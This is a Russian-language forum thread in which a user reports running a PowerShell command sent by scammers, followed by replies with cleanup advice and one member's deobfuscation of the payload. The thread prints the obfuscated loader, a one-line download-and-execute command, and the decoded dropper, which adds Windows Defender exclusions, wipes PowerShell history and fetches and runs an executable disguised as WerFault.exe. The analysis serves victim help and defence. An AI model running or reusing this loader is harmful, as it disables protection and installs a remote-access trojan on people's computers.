Завладели компом через cmd

kungfuupanda · 28 янв 2025

Уроды сказали ввести команду в cmd, и получили удалённый доступ к компу. Что делать? Вот команда
powershell irm "https://raw.githubusercontent.com/ByterCode/Checker/refs/heads/main/check | iex"

EsliHochesh · 28 янв 2025

интернет отруби

Aisan · 28 янв 2025

Интернет выключи для начала

exepert · 28 янв 2025

Винду переустановить

MALWARE · 28 янв 2025

мамонт

скачай system informer

вкладка view -> hide signed processes

покажи скрин

также заверши все cmd.exe, conhost.exe, powershell.exe

Doklsi · 28 янв 2025

Короче, там подгружается xworm, стучит на playit gg, что в принципе для нищих школьников бомжей не существенно

Адекваток · 28 янв 2025

Скачай через телефон прогу, потом зайди в безопасный режим на компе, подключи телефон и перекинь прогу на комп

Даже лучше скачай эту прогу " malwarebytes" она сразу должна помочь

ИроничныйЧёрт · 28 янв 2025

кидает запрос на https://raw.githubusercontent.com/ByterCode/Checker/refs/heads/main/check
там закодированный base64 с лишними нулями, просто так не посмотришь
убираем нули:
import base64

string = "CgAgACAAIAAgACAAIA..."
without_zeros = ""

decoded = base64.b64decode(string)

for charcode in decoded:
if charcode:
without_zeros += chr(charcode)

print(without_zeros)

Python
import base64



string = "CgAgACAAIAAgACAAIA..."

without_zeros = ""



decoded = base64.b64decode(string)



for charcode in decoded:

    if charcode:

        without_zeros += chr(charcode)



print(without_zeros)
получаем
$command = "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";
$command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($command));

$command = "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";
$command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($command));

$swappedDecoded = '';
$input = "$command";
for ($i = 0; $i -lt $input.Length; $i+=2) {
if ($i+1 -lt $input.Length) {
$swappedDecoded += $input[$i+1] + $input[$i];
} else {
$swappedDecoded += $input[$i];
}
}
$command = $swappedDecoded;

$caesarDecoded = '';
$shift = 3;
$input = "$command";
for ($i = 0; $i -lt $input.Length; $i++) {
$caesarDecoded += [char]([byte][char]$input[$i] - $shift);
}
$command = $caesarDecoded;

$xorDecoded = '';
$key = 'xdwd';
$input = "$command";
for ($i = 0; $i -lt $input.Length; $i++) {
$xorDecoded += [char]([byte][char]$input[$i] -bxor [byte][char]$key[$i % $key.Length]);
}
$command = $xorDecoded;

$reversed = "$command";
$reversed = $reversed.ToCharArray();
[Array]::Reverse($reversed);
$command = -join $reversed;
$command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$command"));

$command | . ( ([STRING]$vErboSeprefeReNCe)[1,3]+'x'-JoIn'')

POWERSHELL
$command = "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";

$command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($command));



    $command = "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";

    $command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($command));

 

    $swappedDecoded = '';

    $input = "$command";

    for ($i = 0; $i -lt $input.Length; $i+=2) {

        if ($i+1 -lt $input.Length) {

            $swappedDecoded += $input[$i+1] + $input[$i];

        } else {

            $swappedDecoded += $input[$i];

        }

    }

    $command = $swappedDecoded;

 

    $caesarDecoded = '';

    $shift = 3;

    $input = "$command";

    for ($i = 0; $i -lt $input.Length; $i++) {

        $caesarDecoded += [char]([byte][char]$input[$i] - $shift);

    }

    $command = $caesarDecoded;

 

    $xorDecoded = '';

    $key = 'xdwd';

    $input = "$command";

    for ($i = 0; $i -lt $input.Length; $i++) {

        $xorDecoded += [char]([byte][char]$input[$i] -bxor [byte][char]$key[$i % $key.Length]);

    }

    $command = $xorDecoded;

 

    $reversed = "$command";

    $reversed = $reversed.ToCharArray();

    [Array]::Reverse($reversed);

    $command = -join $reversed;

    $command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$command"));



$command | . ( ([STRING]$vErboSeprefeReNCe)[1,3]+'x'-JoIn'')
тут base64, перестановка символов, шифр цезаря, xor, переворот строки ещё раз base64

получаем
Add-MpPreference -ExclusionProcess "powershell.exe" -ErrorAction SilentlyContinue
Add-MpPreference -ExclusionPath "$env:TEMP" -ErrorAction SilentlyContinue
Add-MpPreference -ExclusionPath "$env:SystemDrive\" -ErrorAction SilentlyContinue
Add-MpPreference -ExclusionPath "$env:SystemDrive/" -ErrorAction SilentlyContinue

Clear-History
Remove-Item -Path (Join-Path $env:APPDATA "\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt") -ErrorAction SilentlyContinue
Remove-Item -Path (Join-Path $env:USERPROFILE "\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt") -ErrorAction SilentlyContinue

$outputFile = Join-Path "C:\Program Files\WindowsPowerShell" "WerFault.exe"

Function Update-File {
$url = "https://github.com/ByterCode/PowerShellExploit/raw/refs/heads/main/Checker.exe"
$outputPath = $outputFile
try {
Invoke-WebRequest -Uri $url -OutFile $outputPath -ErrorAction Stop
return $true
} catch {
Write-Host "Has ERROR Scanner" -ForegroundColor Red
return $false
}
}
if (Test-Path $outputFile) {
Write-Host "Cheat Checker Starting..." -ForegroundColor Green
Start-Process -FilePath $outputFile -NoNewWindow
} else {
Write-Host "Cheat Checker Starting...." -ForegroundColor Red
if (Update-File) {
Write-Host "Cheat Checker Scanned." -ForegroundColor Green
Start-Process -FilePath $outputFile -NoNewWindow
} else {
Write-Host "Cheat Has Detected!!!" -ForegroundColor Red
}
}

Clear-History

POWERSHELL
Add-MpPreference -ExclusionProcess "powershell.exe" -ErrorAction SilentlyContinue

Add-MpPreference -ExclusionPath "$env:TEMP" -ErrorAction SilentlyContinue

Add-MpPreference -ExclusionPath "$env:SystemDrive\" -ErrorAction SilentlyContinue

Add-MpPreference -ExclusionPath "$env:SystemDrive/" -ErrorAction SilentlyContinue



Clear-History

Remove-Item -Path (Join-Path $env:APPDATA "\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt") -ErrorAction SilentlyContinue

Remove-Item -Path (Join-Path $env:USERPROFILE "\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt") -ErrorAction SilentlyContinue



$outputFile = Join-Path "C:\Program Files\WindowsPowerShell" "WerFault.exe"



Function Update-File {

    $url = "https://github.com/ByterCode/PowerShellExploit/raw/refs/heads/main/Checker.exe"                

    $outputPath = $outputFile                                  

    try {

        Invoke-WebRequest -Uri $url -OutFile $outputPath -ErrorAction Stop

        return $true

    } catch {

        Write-Host "Has ERROR Scanner" -ForegroundColor Red

        return $false

    }

}

if (Test-Path $outputFile) {

    Write-Host "Cheat Checker Starting..." -ForegroundColor Green

    Start-Process -FilePath $outputFile -NoNewWindow

} else {

    Write-Host "Cheat Checker Starting...." -ForegroundColor Red

    if (Update-File) {

        Write-Host "Cheat Checker Scanned." -ForegroundColor Green

        Start-Process -FilePath $outputFile -NoNewWindow

    } else {

        Write-Host "Cheat Has Detected!!!" -ForegroundColor Red

    }

}



Clear-History
- сам малварь

kungfuupanda · 28 янв 2025

бл

--- Сообщение объединено с предыдущим 28 янв 2025
тут локер винды

--- Сообщение объединено с предыдущим 28 янв 2025
с нулевой

Не работает 1920х1536 на AMD

ТОП 3 моих любимых курсоров

Потух звук.. Помогите

Очистил пк ccleanerом - теперь херня какая-то с окнами

Замените стандартную громкость Windows приложениями EarTrumpet и ModernFlyouts — это круче

Windows 11 впервые обогнала Windows 10 по доле рынка

Microsoft store не работает как и

Устанавливаем Windows 10/11 без шлака Microsoft

Как обойти вход в учетку на 11 винде

Microsoft объявила о прекращении поддержки Windows 11 SE

Почему схема электропитания удаляется сама после установки её через cmd?

По поводу windows 11

Пиратский лаунчер детектит меня в VMware

После недельного простоя пк, слетает винда(

Дикие фризы на чистой Винде

Ошибка при установки винды

Можно ли как то переключать музыку spotify во время игры?

Bitlocker на втором диске

Задержка появления иконок меню пуск

Как из исо образа винды сделать загрузочную флешку

Как ща весь пакет офиса скачать бесплатно и не урезанный

Комп отрубается

Блокировка Windows с любой точки мира удалённо

Не скачивает файлы

Тухнет экран во время игры

Microsoft Edge получил режим Copilot с встроенным ИИ-помощником

Пропал индикатор языка и меню уведомлений

Заблокало локал. Учетку

Можно ли открыть винду в винде?

Проблема с автозапуском antizapret

Завладели компом через cmd